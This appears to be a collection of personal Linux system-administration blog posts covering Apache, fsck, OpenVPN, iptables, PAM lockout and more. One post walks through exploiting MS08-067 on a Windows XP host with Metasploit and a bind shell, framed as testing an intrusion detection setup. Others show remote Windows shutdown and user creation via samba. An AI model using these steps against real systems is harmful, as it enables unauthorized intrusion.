permits a client to transmit to the host the name of the virtual host

it wants to contact during the SSL handshake. So what you need to do

is make sure you have the very latest apache, compiled with the latest

openssl libraries, and use a recent web browser.

How to list active Apache modules ?

Sometimes we get stuck on basic things in Apache. The httpd command is very useful in this regard.


To list active modules in Apache

root# httpd -t -D DUMP_MODULES

or

root# httpd -M

To list compiled in modules

root#httpd -l

To get virtual host lists

root#httpd -S

To test httpd configuration

root#httpd -t

Understanding vmstat output

As we know, vmstat is a very useful command to monitor system performance in Linux. I issued this command on my RHEL server, and the output is as follows:


root# vmstat

procs -----------memory---------- ---swap-- -----io---- --system-- -----cpu------

r b swpd free buff cache si so bi bo in cs us sy id wa st

0 0 128 1217472 302800 2383476 0 0 17 14 10 15 0 0 100 0 0


What we can conclude from this output ?

Let us first understand, meaning of this result.

procs refers to processes: r for running and b for blocked.

swpd refers to swap used, free to free memory, buff to memory used for buffers and cache to memory used for the page cache.

swap section include swap in(si) and swap out (so)

io section include block in (bi) and block out(bo)

system section include interrupt(in) and context switch (cs)

cpu is the important section; it includes CPU usage by us (user) and sy (system) processes, and id is the idle percentage of the CPU. wa refers to time spent waiting for I/O and st to time stolen from the virtual machine.

Linux Boot Process

As soon as we boot our Linux system, after BIOS execution, stage 1 boot loading takes place. In stage 1 boot loading, the code inside the Master Boot Record of the boot disk executes. The MBR consists of 512 bytes, which include 446 bytes of boot instructions, a 64-byte partition table and a 2-byte magic number.


The 446 bytes of the MBR load the 2nd stage of the boot loader. For example, if you are using GRUB as the boot loader, GRUB is so big that it can't fit in 446 bytes, so the MBR loads the 2nd stage of the boot loader.

What is stage 1.5 of the boot loader ?

Unlike LILO, GRUB can load a Linux kernel from an ext2 or ext3 file system. It does this by making the two-stage boot loader into a three-stage boot loader. Suppose your kernel is on a partition formatted with ext2 or ext3; then GRUB first loads e2fs_stage1_5 and then proceeds to stage 2.

With stage 2 loaded, GRUB can, upon request, display a list of available kernels; /boot/grub/grub.conf gets displayed. You can select a kernel and insert kernel parameters if required. Here, you can also use a command-line shell for greater manual control over the boot process.

After stage 2 specifies the kernel and root filesystem, the kernel is uncompressed and loaded, and after that the root filesystem is mounted. If your kernel executes and the root file system (/) gets mounted properly, the next stage is system initialization.

Remember that a kernel panic error may panic you if your root filesystem is not mounted properly.
init is the first user-space process run after kernel loading. Settings for the init process are present in /etc/inittab; a wrong configuration of /etc/inittab may also disturb you.

TCP Wrapper

TCP Wrappers add an additional layer of protection to a Linux system. TCP Wrappers can be used to GRANT or DENY access to various network services on your machine from the outside network or from other machines on the same network. They do this by using simple access-list rules which are included in the two files /etc/hosts.allow and /etc/hosts.deny.


One must remember that hosts.allow takes precedence over hosts.deny. So, for example, if host A is allowed ssh access to your system via hosts.allow, then a hosts.deny entry doesn't affect it in any way. Also remember that by default all incoming and outgoing connections are allowed if the respective entries are missing from both hosts.allow and hosts.deny.

Example of using TCP Wrapper

Suppose you want to allow SSH access to hosts in a particular domain, say abc.com, and deny access to all others. Then edit the hosts.allow and hosts.deny files in the following way:

/etc/hosts.allow
sshd : .abc.com

/etc/hosts.deny
sshd : ALL
I will also discuss some more complex examples of using TCP Wrappers in the coming days.

Linux Network Installation

As we know, we can install Linux from the network, and the steps for a network installation are very simple. One needs to specify 'linux askmethod' at the installation prompt. By keeping the installation tree on an NFS, HTTP or FTP server, one can install Linux on network client computers.


But booting into the installer still requires a Linux bootable DVD or CD. With a PXE network installation there is no need for a Linux bootable CD or DVD; the system boots through the network card's PXE boot loader.

For a PXE network installation, one needs to create the following setup:

Configure the network (NFS, FTP, HTTP) server to export the installation tree.

Configure the files on the tftp server necessary for PXE booting.

Configure which hosts are allowed to boot from the PXE configuration.

Start the tftp service.

Configure DHCP.

After the given steps, boot the client and start the installation.

PXE Boot Configuration

The system-config-netboot command presents a graphical screen to set up the PXE boot configuration.

The command that can be used on a text terminal is pxeos.

By setting up DHCP and an installation tree on NFS, FTP or HTTP, one can install Linux using PXE.

The following link gives the exact steps:

http://www.redhat.com/docs/manuals/enterprise/RHEL-4-Manual/sysadmin-guide/ch-pxe.html

Logging telnet sessions

We can use TCP Wrappers to log telnet access to a system. spawn launches a shell command as a child process; this concept can be used to log telnet sessions. To achieve this, just make the following entry in /etc/hosts.allow on the system hosting the telnet server:


in.telnetd : .abc.com : spawn /bin/echo `/bin/date` from %h >> /var/log/telnet.log : allow

Secure deletion of files

Suppose you want to delete a file in a way that makes it impossible to recover. Normally, when we delete a file, the data is not actually destroyed; only the index listing where the file is stored is destroyed. There are a number of recovery tools that try to rebuild the index and recover the data.


On a busy system, freed space may get reused within seconds, in which case data recovery becomes impossible. But suppose you want to be sure that after deletion no method can get the data back. The best way is to destroy the media holding the data, but with large-capacity media this is not a practical solution. The shred utility tries to achieve a similar effect, so the shred command helps in securely deleting files.
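Usage is simple (the file name is just an example):

# overwrite the file, add a final pass of zeros, then remove it
shred -z -u secret.txt

Note that shred's assumption of in-place overwriting does not hold on every filesystem; journaling modes such as ext3's data=journal can keep copies of the data elsewhere.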

Understanding subshell

To understand the concept of a subshell, let us take an example.


Suppose we execute the following commands:

root#pwd

/root

root#cd /opt/backup;pwd

The output will be:

/opt/backup

root# pwd

/opt/backup

Now try executing the following commands:

root# (cd /opt/backup;pwd)

/opt/backup

But

root#pwd

/root

We can notice the difference: the parentheses () cause a subshell to be invoked, in

which the change of directory is executed. After executing pwd in the subshell,

the subshell ceases to exist and we are back in the original shell, so we are still

in /root.

Migration old style slapd.conf to new slapd-config

Today I decided to migrate my OpenLDAP configuration from the traditional slapd.conf file to the new slapd-config structure. With the new slapd-config structure it is possible to apply changes to a running LDAP server; I mean there is no need to restart the LDAP server for configuration changes. The traditional slapd.conf has the following format:


# global configuration directives
<global config directives>

# backend definition
backend <type>
<backend-specific directives>

# first database definition & config directives
database <type>
<database-specific directives>

# second database definition & config directives
database <type>
<database-specific directives>

The new slapd-config structure creates .ldif files that store the configuration in LDAP format.

My existing slapd.conf has the following domain definition:

----------------------------

access to * by none

Include ...

pidfile ...

argsfile ...

database bdb

suffix dc=vk,dc=com

rootdn cn=Manager,dc=vk,dc=com

rootpw secret

database config

rootpw config

index objectClass eq

-------------------------------

Note: the config database was added for migration purposes.

I migrated this configuration into the new slapd.d (slapd-config) layout. For this I took the following steps.

Created the slapd.d folder:

root#mkdir /usr/local/etc/openldap/slapd.d

Applied the slaptest command:

root# slaptest -f /usr/local/etc/openldap/slapd.conf -F /usr/local/etc/openldap/slapd.d

After successful execution of the command, I noticed that one file and one folder had been created inside the directory /usr/local/etc/openldap/slapd.d:

folder name: cn=config, and file name: cn=config.ldif

Inside the cn=config folder a number of other files were created.

Using syslog

We can configure our syslog configuration file for organized logging. The system logger collects messages from programs and even from the kernel. These messages are tagged with a facility that identifies the broad category of the source, e.g., mail, kern (for kernel messages), or authpriv (for security and authorization messages). In addition, a priority specifies the importance (or severity) of each message. The lowest priorities are (in ascending order) debug, info, and notice; the highest priority is emerg, which is used when your disk drive is on fire. The complete set of facilities and priorities is described in syslog.conf(5) and syslog(3).


Messages can be directed to different log files, based on their facility and priority; this is controlled by the configuration file /etc/syslog.conf. The system logger conveniently records a timestamp and the machine name for each message.

Priority names in the configuration file normally mean the specified priority and all higher priorities. Therefore, info means all priorities except debug. To specify only a single priority (but not all higher priorities), add "=" before the priority name. The special priority none excludes facilities, as we show for /var/log/messages and /var/log/debug. The "*" character is used as a wildcard to select all facilities or priorities. See the syslog.conf(5) manpage for more details about this syntax.

The local[0-7] facilities, reserved for arbitrary local uses, can be sent to separate files. This provides a convenient mechanism for categorizing your own log messages.
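A few sample selector lines illustrating the syntax (the file paths are just examples):

# mail facility, priority info and above
mail.info            /var/log/mail.log
# exactly priority debug, kernel messages only
kern.=debug          /var/log/debug.log
# everything at info and above, except mail
*.info;mail.none     /var/log/messages
# one of the local facilities, for your own scripts
local3.*             /var/log/local3.log

You can feed a local facility from your own scripts with, e.g., logger -p local3.info "message".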

Logging remotely

Configure /etc/syslog.conf for remote logging, using the "@" syntax:

/etc/syslog.conf:

# Send all messages to remote system "loghost"

*.* @loghost

On loghost, tell syslogd to accept messages from the network by adding the -r option:

# syslogd -r ...

Disable console program access

The /etc/security/console.apps/ directory should contain one file per


application that wishes to allow access to console users. The filename

should be the same as the service name. To disable console-equivalent

access to programs like shutdown, reboot, and halt for regular users

on a server:

[root@vishesh] /# rm -f /etc/security/console.apps/halt

[root@vishesh] /# rm -f /etc/security/console.apps/poweroff

[root@vishesh] /# rm -f /etc/security/console.apps/reboot

[root@vishesh] /# rm -f /etc/security/console.apps/shutdown

samba+ldap setup

After working for around 2 years on a samba+ldap setup, I can say it is stable and most useful where we need a Linux-based authentication server to authenticate Windows users. User, computer and group accounts get stored in LDAP (OpenLDAP) format in a samba+ldap setup, the same as in Windows Active Directory. My setup, which has been functioning properly for the last 2 years without any issues, is as follows.


The content of my smb.conf file is as follows:
--------------------------------------------
[global]
workgroup = test
server string = test1
netbios name = test1
ldap passwd sync = yes
security = user
passdb backend = ldapsam:ldap://127.0.0.1
ldap suffix = dc=test,dc=com
ldap machine suffix = ou=Computers
ldap user suffix = ou=People
ldap group suffix = ou=Group
ldap admin dn = "uid=root,ou=People,dc=test,dc=com"
domain master = yes
domain logons = yes
logon path =
add user script = /usr/sbin/smbldap-useradd "%u"
add group script = /usr/sbin/smbldap-groupadd "%g"
add machine script = /usr/sbin/smbldap-useradd -w "%u"
delete user script = /usr/sbin/smbldap-userdel "%u"
delete group script = /usr/sbin/smbldap-groupdel "%g"
local master = yes
os level = 254
preferred master = yes
wins support = yes

[netlogon]
comment = Network Logon Service
path = /var/lib/samba/netlogon
guest ok = yes
writable = no
share modes = no

------------------------------------------------------

My ldap server configuration is as follows

(content of slapd.conf file)

------------------------------------------------------

include /etc/openldap/schema/core.schema

include /etc/openldap/schema/cosine.schema

include /etc/openldap/schema/samba.schema

include /etc/openldap/schema/inetorgperson.schema

allow bind_v2

pidfile /var/run/openldap/slapd.pid

argsfile /var/run/openldap/slapd.args

access to *

by self write

by users read

by anonymous read

database bdb

suffix "dc=test,dc=com"

rootdn="cn=Manager,dc=test,dc=com"

rootpw {SSHA}oifg.ytugjhkk

directory /var/lib/ldap/test.com

index uidNumber,gidNumber eq

------------------------------------------------------

Note: ensure that the samba.schema file is

present in the /etc/openldap/schema directory.

If it is not present, search for the samba.schema file on the system

and copy it into /etc/openldap/schema.

Download & install smbldap tool from following link.

http://tinyurl.com/344ypzg

Apache server-status

Today I decided to monitor my Apache web server via server-status. For detailed analysis I turned the 'ExtendedStatus' flag on (ExtendedStatus On) and uncommented the following lines:




<Location /server-status>

SetHandler server-status

Order deny,allow

Allow from all

</Location>



After that I restarted Apache. Accessing http://localhost/server-status shows the server status in detail, and the Request section attracted my attention: besides the GET method, PROPFIND and OPTIONS are also mentioned there. After investigation I concluded that PROPFIND is related to WebDAV, and that the OPTIONS method represents a request for information about the communication options available on the request/response chain identified by the Request-URI.

While investigating via Google I also noticed some concern that Apache server-status shows thousands of "::1 OPTIONS * HTTP/1.0" entries. The important thing I noticed is that even though no client was accessing the Apache server, server-status showed a number of PROPFIND and OPTIONS requests from random clients.

super block recovery and fsck stages

As we know, fsck is a great command to check and repair errors on a file system. Many times I have found a filesystem in panic, and fsck made it operational again. I have used fsck many times, but every time I ensured that the filesystem to which I applied fsck was in an unmounted state.


But the thing I was most interested in is the fsck stages. Whenever I issue the fsck command, it outputs:

Phase 1: Checking Inodes,blocks and sizes

Phase 2: Checking directory structure

Phase 3: Checking directory connectivity

Phase 4: Checking Reference count

Phase 5: Checking group summary information

fsck checks the integrity of several different features of the file system. The most important check that fsck does is of the super block. As we know, the super block is the most important aspect of a file system: it stores summary information for the volume. The super block is also the most frequently modified item in the file system, so the chance of super block corruption is always high.

Checks on the superblock include:

A check of the file system size, which obviously must be greater than the size computed from the number of blocks identified in the superblock

The total number of inodes, which must be less than the maximum number of inodes

A tally of reported free blocks and inodes

On a number of occasions I have found the super block of my file system corrupted. Although it is very difficult for me to dictate the reasons for super block corruption, the better part is that a backup super block is always present in our file system. To find where the alternate super blocks are, we can use the dumpe2fs command as follows:

root# dumpe2fs /dev/sda1 | more

Generally block number 32768 holds a backup super block, so to recover a filesystem using the backup super block, fsck can be used in the following way:

root# fsck -b 32768 /dev/sda1

Other than super block corruption, other errors can easily be fixed by using fsck in the straightforward way:

root# fsck -y /dev/sda1

(Here the -y option saves us from pressing y each time we are asked for a yes during recovery.)

When inodes are examined by fsck, the process is sequential in nature and aims to identify inconsistencies in format and type, link count, duplicate blocks, bad block numbers, and inode size. Inodes should always be in one of three states: allocated (being used by a file), unallocated (not being used by a file), and partially allocated, meaning that during an allocation or unallocation procedure, data has been left behind that should have been deleted or completed. Alternatively, partial allocation could result from a physical hardware failure. In both of these cases, fsck will attempt to clear the inode.

The link count is the number of directory entries that are linked to a particular inode. fsck checks that the number of directory entries listed is correct by examining the entire directory structure, beginning with the root directory, and tallying the number of links for every inode. Clearly, the stored link count and the actual link count should agree, but the stored link count can occasionally differ from the actual link count. This could result from a disk not being synchronized before a shutdown, for example: while changes to the file system have been saved, the link count has not been correctly updated. If the stored count is not zero but the actual count is zero, then disconnected files are placed in the lost+found directory found in the top level of the file system concerned. In other cases, the actual count replaces the stored count.

For finding alternate/backup superblocks, the following command can also be used:

# mke2fs -n /dev/device

Use the -j switch as well if it is an ext3 file system (mke2fs -n -j /dev/device).

Files with no inode, no owner and no group.

Yesterday I encountered a file system error on my server. Some files in a partition formatted with ext3 were showing ? in place of the inode, owner and group fields.


root# cd /data/Trash

root# ls -li

? ? ? ? ? abc.txt

I became confused. The find command also reported a number of files which have no owner:

root# find /data/Trash -nouser

Investigating the problem led to the conclusion that there was a file system error in that partition. I advised applying the fsck command immediately. Applying fsck solved the problem, but I am still searching for the conditions under which a file can exist without an inode number.

root# fsck -y /dev/vg1/lv1

I also ensured that the file system got fsck applied on reboot:

root# shutdown -Fr now

One interesting point I learned along the way is that a file system can be mounted a maximum of 16 consecutive times without fsck being applied; after that, a warning comes to run fsck, although this setting can be overridden with the tune2fs command.
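A sketch of how to inspect and change that counter with tune2fs (the device name and count are examples):

# show the current mount count and the maximum before a forced check
tune2fs -l /dev/vg1/lv1 | grep -i 'mount count'
# raise the maximum to 30 mounts
tune2fs -c 30 /dev/vg1/lv1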

The best option to reduce file system errors is to apply fsck at boot time. This can easily be done by making an entry in /etc/fstab; for example, in my case the entry is:

/dev/vg1/lv1 /data ext3 defaults 1 2

Here the first number (1) is the dump field, and the second number (2) is the fsck pass number, meaning this filesystem is checked after the root filesystem (which uses pass 1).

Linux Kernel Architecture

The Linux kernel is composed of five main subsystems:


The Process Scheduler (SCHED)

The Memory Manager (MM)

Virtual File System (VFS)

Network Interface (NET)

Inter-Process Communication (IPC).

The Linux kernel provides a virtual interface to user processes. Each subsystem of the kernel has a set of data structures and corresponding programs that work on those data structures. To understand Linux kernel internals we need to elaborate on each of the subsystems, and the data structures of each subsystem need to be understood first.

Memory usage by linux process

The following command can tell us the memory usage of an individual process in Linux.


root# ps aux

USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND

root 1 0.0 0.0 2020 636 ? Ss Jan 21 0.02 init[5]

In the above given output VSZ stands for Virtual Set Size and RSS stands for Resident Set Size. These two VSZ and RSS tell how much memory process are taking up.

But the output of ps is not really accurate. The reason is very simple: as we know, a running process uses many loaded shared libraries. The ps command also includes the space used by those libraries, but the same libraries can be shared by many processes. To see the memory map of the loaded shared libraries used by a particular process, we can use the pmap command.

root# pmap 2939

(Here 2939 is process id)

VPN connectivity using OpenVPN

How I set up an OpenVPN server on RHEL 5.1 and a client on Windows XP.


I installed the OpenVPN RPM on my Linux system by downloading openvpn-2.0 from download.fedora.redhat.com/pub/epel.

During installation I got a dependency error on the lzo2 package, so I installed lzo2 as well and continued with the openvpn installation. After installing the openvpn RPM, I created server.conf in the /etc/openvpn directory with the following statements:

root# vi /etc/openvpn/server.conf

local 192.168.11.83
port 8888
dev tap0
secret key.txt
persist-key
persist-tun
ping-timer-rem
ping-restart 60
ping 10
comp-lzo
user nobody
verb 3

As I used the tap0 device for the VPN interface, I added this tunnel device using the following command:

openvpn --mktun --dev tap0

After creating the tunnel device, I added my interface and the tunnel device into a bridge using the following commands:

 brctl addbr br0
 brctl addif br0 eth1
brctl addif br0 tap0

Now i assigned ip to these interfaces

ifconfig eth1 0.0.0.0 promisc up
 ifconfig tap0 0.0.0.0 promisc up

I assigned the IP via DHCP, so:

dhclient br0

Now my Ethernet bridging for the OpenVPN setup was OK, and the last thing I needed to do was copy the key.txt that I generated on the Windows client into the /etc/openvpn folder.

Finally I started my OpenVPN server:

root# service openvpn start

I downloaded OpenVPN for Windows and installed it on my Windows XP machine. Now the client needed to be configured on Windows XP. For that I opened the c:\program files\openvpn\config folder and created a test.ovpn file with the following entries:

remote 192.168.11.83
port 8888
dev tap
secret key.txt
ping 10
ifconfig-nowarn
comp-lzo
verb 3

I ensured that the key.txt file existed in the c:\program files\openvpn\config folder.

Now I connected my Windows OpenVPN client to the OpenVPN server running on the Linux system. Note: I followed the instructions from http://openvpn.net/index.php/open-source/documentation/install.html?start=1

vmware advantage over others

Nowadays three virtualization technologies are popular in the market: Citrix's Xen, Microsoft Hyper-V and VMware. VMware is certainly the market leader. After reading some discussions and articles I concluded that there are some striking features in VMware that are not available in its counterparts. Some of them are:


Storage motion

DRS

Memory overcommit

VMware vSphere

Although VMware's price is one of the issues, it is the first choice in enterprise-level virtualization. In desktop virtualization it still has a lot to do.

How large is the virtual address space for a process in Red Hat Enterprise Linux?

A query often arises about how large the virtual address space for a process is under Red Hat Enterprise Linux 5. The Red Hat knowledge base says the following on this matter.

This depends on the capabilities of the CPU, the kernel running on the CPU, and how the application was compiled. CPUs such as the Intel Pentium 4 and the AMD Athlon are 32-bit processors, will use 32-bit kernels, and will run applications that are compiled and linked for a 32-bit environment. In contrast, most later processor models are capable of running 64-bit code; this is often indicated as "AMD64", "EM64T", "x86-64" or even "x64". They can boot either 32-bit or 64-bit kernels and, when using a 64-bit kernel, can execute both 32-bit and 64-bit applications.

In each of these cases, the virtual address space available to the executing application is different, as shown in the table below:

CPU           Kernel               Application   Virtual Address Size
32 or 64 bit  32 bit (smp *)       32 bit        slightly under 3GB
32 or 64 bit  32 bit (hugemem **)  32 bit        slightly over 3.7GB
64 bit        64 bit               32 bit        4GB
64 bit        64 bit               64 bit        more than 256GB
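To tell which case applies on a given machine, two quick checks are the 'lm' (long mode) flag in /proc/cpuinfo, which indicates a 64-bit capable CPU, and uname -m, which shows the architecture of the running kernel:

root# grep -w lm /proc/cpuinfo
root# uname -m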


GNOME vs KDE

Recently I followed some discussions by professionals on GNOME vs KDE as a desktop.


My conclusion is that currently GNOME has an edge over KDE. GNOME is considered to be more stable, reliable and easier to handle than KDE. Many people think that XFCE is faster than both GNOME and KDE, but some feel that benchmarking tests are unable to prove that XFCE is faster. Some believe that KDE 3.5 was fine but KDE 4.x is not as good. Many professionals prefer Fluxbox.

But the final answer is 'what you like and what you use', I mean the taste of the user.

Fastest Linux distribution

It depends on many factors such as the kernel, the file system, etc. The Linux kernel can be tuned for various parameters. We can tune and prioritize both process and I/O scheduling, processor, memory and I/O affinity, paging, shared and other memory/VM settings, etc. I mean it depends on your tuning as well as how many applications and daemons are running. But the question still remains relevant: with the same set of applications and daemons and the same kernel tuning, which distribution runs fastest?


As far as performance is concerned, many experts believe that BSD (http://www.freebsd.org/), Arch (http://www.archlinux.org/) and Gentoo (http://www.gentoo.org/) perform better than others. Some techies also prefer compiling their own linux from Linux From Scratch (http://www.linuxfromscratch.org/). Although I have never used any of these preferred distros, my experience says that for better performance Slackware (http://www.slackware.com/) can also be one of the choices. One important point to remember is that there is no such thing as the fastest linux distribution; it all depends on your taste, and how much you tune and customize linux for yourself. For the latest trends in popularity you can visit distrowatch.com

First experience of windows xp hacking

For the last few days I have been working with snort (an Intrusion Detection System) to make my network more secure. To test the snort setup I used the Metasploit tool. In between, I decided to test my metasploit skills by hacking a windows xp system. Since I am using the Backtrack live cd, I found metasploit in the directory /pentest/exploits/framework3, where I found the program msfconsole


root# cd /pentest/exploits/framework3

root# ./msfconsole

Now I am inside metasploit

msf>

I used the following commands inside metasploit to hack a windows xp (sp2) system with ip 192.168.1.5 from my system (192.168.1.3)

msf> use windows/smb/ms08_067_netapi

msf> show options

msf> set RHOST 192.168.1.5

msf> set LHOST 192.168.1.3

msf> set PAYLOAD generic/shell_bind_tcp

msf> exploit

After that the exploit started and gave me a message that a session was created. Cheers, I hacked a windows box, it was so easy. One more important thing: to move between sessions we can use

msf> sessions -i 1

Hacking is really fun, but it is really not good that windows systems are so vulnerable.
Enjoy Hacking !
Helpful links are http://www.metasploit.com/, http://www.backtrack-linux.org/

console vs terminal

The main difference between a console and a terminal in linux is that a console uses the whole screen to enter line-oriented commands in text mode, while a terminal emulates a console within a window, normally created by the X window environment. In linux there are six consoles available, each one accessible with the shortcut keys Ctrl-Alt-F1 to Ctrl-Alt-F6.


I can say a console is a shell without running X, while a terminal is available within running X. More or less both are the same in functionality but have some behavioral differences: a terminal is flexible and we can have more than 6 terminals open at the same time, but it requires X windows. Using a console means no mouse and no graphics, just type commands and get output.
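From a shell you can also jump between consoles with the chvt (change virtual terminal) command; for example, to switch to console 3:

root# chvt 3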

How to use xargs?

The xargs command is used where we need to pass the stdout of one command as arguments to another, building command lines in manageable batches instead of one huge argument list. For example, suppose you need to delete all avi files (files that have the avi extension) from the /root folder; then you can use xargs in the following way


root# find /root -name '*.avi' -type f -print | xargs rm -f

But you may face errors if some file names contain spaces or other special characters. In that case just modify your command in the following way

root# find /root -name '*.avi' -type f -print0 | xargs -0 rm -f

To achieve the same task you can also use -exec with find in the following way

root# find /root -name '*.avi' -type f -exec rm -f {} \;

Or if you want to be a little bit more scripty, try the following

move into /root first

root# cd /root

then

root# for a in *.avi; do rm -f "$a"; done
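To see the batching behaviour of xargs for yourself, compare the following two commands; the first passes all arguments in one batch, the second (-n 1) forces one argument per invocation:

root# echo one two three | xargs echo
root# echo one two three | xargs -n 1 echo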

Packet crafting using scapy

I was always in search of a tool that allows me to create my own network packets by giving values for the protocol fields. My search ended with scapy. scapy is a great tool to craft tcp/ip packets and send them over the network. This is how I used scapy to test my firewall rules.


I sent a packet with the TCP SYN flag set, to port number 80 on destination 192.168.1.3.

(Note: the text in {} is a comment)

root# scapy

>>>ans,uans=sr(IP(dst="192.168.1.3")/TCP(sport=1100,dport=80,flags="S")) {sr stand for send/receive}

Finished to send 1 packet ....

>>>for snd,rcv in ans: {don't forget to mention : at end}

... {put space here} print snd.seq,rcv.seq

... {press enter key}

0 12987

So, I got the sequence numbers of both the sent packet and the received packet.
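A handy habit before sending: build the packet first and inspect every field with scapy's show() method, then pass it to sr().

>>> pkt=IP(dst="192.168.1.3")/TCP(sport=1100,dport=80,flags="S")
>>> pkt.show()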

Setup mobile broadband on linux

I am using a sony ericsson k790i with an Aircel (India) connection. To set up mobile broadband on my linux (BackTrack 4) laptop, I did the following steps.


Step1. I plugged my mobile to my laptop (using usb data cable).

Step2. I issued the command wvdialconf, which detected the usb modem of my mobile and created the conf file /etc/wvdial.conf

root# wvdialconf

root# more /etc/wvdial.conf

Step3. I edited /etc/wvdial.conf and ensured the following entries are in the file. You may find most of the entries already present.

root# vi /etc/wvdial.conf

[Dialer Defaults]
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
Init3 = AT+CGDCONT=1,"IP","aircelgprs","",0,0
Modem Type = USB Modem
Phone = *99#
ISDN = 0
Stupid Mode = 1
Password = blank
New PPPD = yes
Username = blank
Modem = /dev/ttyACM0
FlowControl = NOFLOW
Baud = 460800

(Remember that aircelgprs is my APN; the username and password are blank)

Step4. I issued the command wvdial, and after a few messages my laptop was connected to the internet.
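So the whole dial-up boils down to:

root# wvdial

wvdial reads [Dialer Defaults] from /etc/wvdial.conf, dials *99# and hands the connection over to pppd; press Ctrl-C to disconnect.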

How to stop syn flood attack using iptables ?

This is what I did to stop a syn flood attack on my linux system.


iptables -N syn-flood

iptables -A INPUT -p tcp --syn -j syn-flood

iptables -A syn-flood -p tcp --syn -m hashlimit \
  --hashlimit 200/sec --hashlimit-burst 3 \
  --hashlimit-htable-expire 300000 --hashlimit-mode srcip \
  --hashlimit-name testlimit -j RETURN

iptables -A syn-flood -m recent --name blacklist --set -j DROP

Now let me explain the rules I added. First of all I created a chain named syn-flood.

iptables -N syn-flood

Then I sent all tcp syn packets to that chain:

iptables -A INPUT -p tcp --syn -j syn-flood

After that I used the hashlimit match, which is an extension of the limit match. This match keeps a hash table of syn requests per source ip address. As long as syn requests from a source stay within 200 per second (with a burst of 3), the rule RETURNs the packet to the INPUT chain for normal processing; anything above that rate falls through to the next rule. --hashlimit-htable-expire determines after how many milliseconds an idle hashtable entry expires. --hashlimit-name gives this hashtable a specific name; it can be viewed inside the /proc/net/ipt_hashlimit directory.

iptables -A syn-flood -p tcp --syn -m hashlimit \
  --hashlimit 200/sec --hashlimit-burst 3 \
  --hashlimit-htable-expire 300000 --hashlimit-mode srcip \
  --hashlimit-name testlimit -j RETURN

To put the ip doing the syn flooding into a black list I used the 'recent' match as follows. This rule matches whatever fell through the hashlimit rule, creates a list (--name) named blacklist, makes a new entry (--set) in it for the source ip, and then DROPs the packet.

iptables -A syn-flood -m recent --name blacklist --set -j DROP
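One possible refinement, just a sketch I have not battle-tested: the rule above only records offenders in the blacklist; to actually keep them out for a while, add an early INPUT rule that checks the list, here with an assumed ban window of 600 seconds:

iptables -I INPUT -m recent --name blacklist --rcheck --seconds 600 -j DROP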

Suggest me if you have any better idea.

Turn off window machine from remote linux machine

Using samba you can turn off a windows machine from a remote linux machine. Use the net rpc command in the following way


net rpc SHUTDOWN -I <ip of windows machine> -U <windows username>

For example, to shut down the windows machine with ip 192.168.5.5 as user administrator, use the following

root# net rpc SHUTDOWN -I 192.168.5.5 -U administrator
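If I remember the net manpage correctly, you can also give the user a warning instead of an instant power-off, with -t (timeout in seconds) and -C (comment):

root# net rpc SHUTDOWN -I 192.168.5.5 -U administrator -t 60 -C "going down in 60 seconds"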
 
You can also create a user remotely from the linux pc by entering the following command

root# net rpc user ADD -I <ip of windows pc> <user name> <password> -U administrator

Save session and resume it in another terminal

Suppose you are working on your office server and want to save the session and resume it from another location, say from your home. The screen command is used for this purpose. Let us take an easy example to understand it. Suppose you are on console 2 (alt+ctrl+f2) and issue the following commands


root# screen -S test

root# echo hello

Now move to console 3 (alt+ctrl+f3) and type the following command

root# screen -d -R test (here -d detaches the session from console 2 and -R reattaches it here)

Check the output; I hope you see the magic of the screen command. To exit from a session, use the exit command.
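From inside a screen session you can also detach by hand with the key combination Ctrl-a d, and list all existing sessions with

root# screen -ls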

Lock account in linux

To lock a user account in linux, the following command can be used


root# passwd -l <username>

For example

root#passwd -l user1

The command will lock user1; I mean user1 can't log in to the system now.

To check the lock status of an account, we can use the passwd command in the following way

root# passwd -S <username>

For example

root# passwd -S user1

If it shows LK, that means the account is locked.

And if the account has to be unlocked, use passwd in the following way

root# passwd -u <username>

For example

To unlock account user1

root# passwd -u user1
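As an aside, usermod can do the same job:

root# usermod -L user1
root# usermod -U user1

(-L locks the account, -U unlocks it.)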

But what if you want to lock an account after a given number of failed login attempts? Suppose you want to lock an account after 3 unsuccessful login attempts. The pam_tally pam module is used for this purpose; I am going to discuss the implementation of this module in my next article.

You can try the following commands to list all locked users


passwd -S -a | grep LK | cut -d " " -f1
or
passwd -S -a | awk '/LK/{print $1}'

Lock account in linux using pam_tally or pam_tally2

The pam_tally pam module can be used to lock an account after a certain number of failed login attempts. For example, if you want to lock a user after 3 failed login attempts, then configure your /etc/pam.d/system-auth file in the following way


auth required pam_tally.so onerr=fail deny=3

(Remember to put this line above the line auth required pam_unix.so)

account required pam_tally.so reset

Now save the system-auth file and try it with some user. This worked on my RHEL 5.4 system.

But suppose you have an extended requirement, to keep the user locked for some seconds or minutes after the invalid login attempts. You can try the pam_tally2 pam module. In the following statement the unlock_time is 5 minutes (300 seconds) after the account gets locked for 3 unsuccessful login attempts. Edit the /etc/pam.d/system-auth file in the following way

auth required pam_tally2.so deny=3 unlock_time=300

To get information about when the last invalid login was attempted, you can use the following command

root# pam_tally2 -u <username>

To manually unlock the account, use the following command

root# pam_tally2 -r -u <username>

To get help, try the command man pam_tally2.

How to block pen drive in linux?

The easiest way to disable usb storage devices in linux is to create the following file


/etc/modprobe.d/no-usb

And add following line inside the file

install usb-storage /bin/true

Cheers, usb storage devices are now blocked on your linux system. I did this on my RHEL 5.4 system.
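To verify, try loading the module by hand; with the install override in place, modprobe runs /bin/true instead of loading the driver, so lsmod should show nothing:

root# modprobe usb-storage
root# lsmod | grep usb_storage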

Lock console in linux

Suppose you are working in text mode, maybe on a console or remotely using telnet or ssh, and you want to lock your working screen. The vlock command is used for this purpose. For example


root# vlock

This tty is now locked.

Please enter the password to unlock.

Supplying the password will unlock the screen.

If you are on a graphical screen, the xlock and xscreensaver commands will do the same. I installed vlock through the yum repository on my rhel 5.4 system,

root# yum install vlock

But xlock (now xlockmore) is not present in the repository, so try the following link http://rpm.pbone.net/index.php3/stat/4/idpl/2122967/com/xlockmore-5.18-2.1.el5.rf.i386.rpm.html .

Determine TCP Wrapper Support

TCP Wrapper is a host-based networking ACL system, used to filter network access to our linux system. Remember that libwrap is the actual library that implements TCP Wrapper. But how will we determine which daemons support TCP Wrapper, I mean which server applications are compiled against libwrap? Use the following command

root# egrep -l libwrap /usr/bin/* /usr/sbin/*
/usr/sbin/vsftpd
/usr/sbin/sshd
.....
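Another way, for a single binary, is to check its dynamic library dependencies with ldd; a line mentioning libwrap confirms TCP Wrapper support:

root# ldd /usr/sbin/sshd | grep libwrap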
